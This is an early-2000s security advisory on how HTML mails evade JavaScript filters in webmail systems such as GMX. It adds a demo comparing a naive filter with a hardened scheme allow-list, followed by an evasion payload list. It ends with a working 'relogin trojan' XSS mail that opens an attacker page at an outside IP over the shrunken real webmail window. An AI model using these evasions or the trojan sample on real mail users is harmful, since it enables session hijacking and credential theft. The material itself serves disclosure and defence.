JavaScript filter problem in webmail systems (gmx.net and others)
UPDATE 2001/06/11
After testing 8 independent and different free webmail systems I found
out that this bug, applied in various varieties :-), is extremely DANGEROUS.
(The only system "untouched" by now is HOTMAIL !?)
(New) variations of this attack:
1) The <img> tag is just one of many possible places for JS code in HTML messages!
2) Using upper-case characters, LFs and CRs inside the "javascript:" scheme evades many JS filters!
3) Named and numeric (Unicode) character references can be used for the same purpose!
4) Many other tags are possible (bgsound, table, object, meta tags in the head, and so on...)
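The evasions in points 2 and 3 above, as an added example that is not part of the original advisory: a naive "javascript:" filter of the kind the advisory says many webmail systems used, the constructed src attribute values that slip past it, and a hardened check that decodes character references and canonicalises the value the way a browser's URL parser does before allow-listing the scheme. The payloads and the small entity table are constructed for the demo; a real filter uses a complete HTML entity table.

```javascript
// Added example, not code from the advisory: naive string filter vs. a
// scheme allow-list applied to a canonicalised attribute value.

// Naive filter: literal, case-sensitive substring match on the raw attribute.
function naiveFilterBlocks(attrValue) {
  return attrValue.indexOf("javascript:") !== -1;
}

// Decode the character references an HTML mail can carry: named (&colon;),
// decimal (&#106;) and hex (&#x6A;). Only the named references needed for the
// demo are listed here (assumption: a real filter uses the full HTML table).
const NAMED_REFS = new Map([
  ["amp", "&"], ["lt", "<"], ["gt", ">"], ["quot", '"'], ["apos", "'"],
  ["colon", ":"], ["Tab", "\t"], ["NewLine", "\n"],
]);
function decodeCharRefs(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return NAMED_REFS.has(body) ? NAMED_REFS.get(body) : match;
  });
}

// Canonicalise like a browser's URL parser: drop tab/CR/LF anywhere, strip
// leading and trailing C0 controls and spaces, then read the scheme.
function extractScheme(attrValue) {
  let s = decodeCharRefs(attrValue);
  s = s.replace(/[\t\n\r]/g, "");
  s = s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(s);
  return m ? m[1].toLowerCase() : null; // null: relative URL, no scheme
}

// Hardened rule: allow-list the scheme instead of deny-listing a string.
const ALLOWED_SCHEMES = new Set(["http", "https"]);
function hardenedAllows(attrValue) {
  const scheme = extractScheme(attrValue);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed src attribute values mirroring the advisory's points 2 and 3.
const PAYLOADS = [
  "javascript:alert(1)",          // plain form: the naive filter catches it
  "JaVaScRiPt:alert(1)",          // upper-case letters
  "java\nscript:alert(1)",        // LF inside the scheme
  "java\rscript:alert(1)",        // CR inside the scheme
  "\tjavascript:alert(1)",        // leading tab (naive substring match still hits)
  "&#106;avascript:alert(1)",     // decimal character reference
  "&#x6A;avascript:alert(1)",     // hex character reference
  "javascript&colon;alert(1)",    // named character reference
  "http://example.invalid/a.gif", // benign absolute URL
  "/images/logo.gif",             // benign relative URL
];

// Payloads that slip past the naive filter but are rejected by the hardened one.
function naiveMisses(payloads) {
  return payloads.filter((p) => !naiveFilterBlocks(p) && !hardenedAllows(p));
}

for (const p of PAYLOADS) {
  console.log(JSON.stringify(p).padEnd(34),
    "naive blocks:", naiveFilterBlocks(p), " hardened allows:", hardenedAllows(p));
}
console.log("evasions the naive filter misses:", naiveMisses(PAYLOADS).length);
```

The hardened check only works if it is handed attribute values from a real HTML tokeniser; a regex hunt for `<img src=` in the raw mail body is exactly what points 1 and 4 above get around, since the same URL can sit in a dozen other attributes and tags.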
The "old" advisory:
Problem description:
The <img> tag can be used to embed malicious JavaScript within HTML mails.
Once the HTML mail part is opened by the GMX user, the embedded JavaScript
is executed by the web browser (if JavaScript is enabled :-) in the context
of the webmail session. This makes it possible to place trojans and to execute
URL-based webmail commands with the user's session, leading to a total
compromise of the user's webmail account.
BTW: THIS works for many other webmail systems (check out www.a-topmail.at).
Sample with a simple relogin trojan (the real webmail window is shrunk to 1x1
pixel and a window with an attacker-controlled page is opened full-screen on top of it):
---cut here---
<html><body>
<!-- the src attribute carries a javascript: URL; the browser runs it as soon
     as the HTML mail part is rendered, in the context of the webmail page -->
<img src="javascript:
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx','width=1000,height=800');
window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);
w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
<h4>mungo baby</h4></body></html>
---cut here---
RC-EOF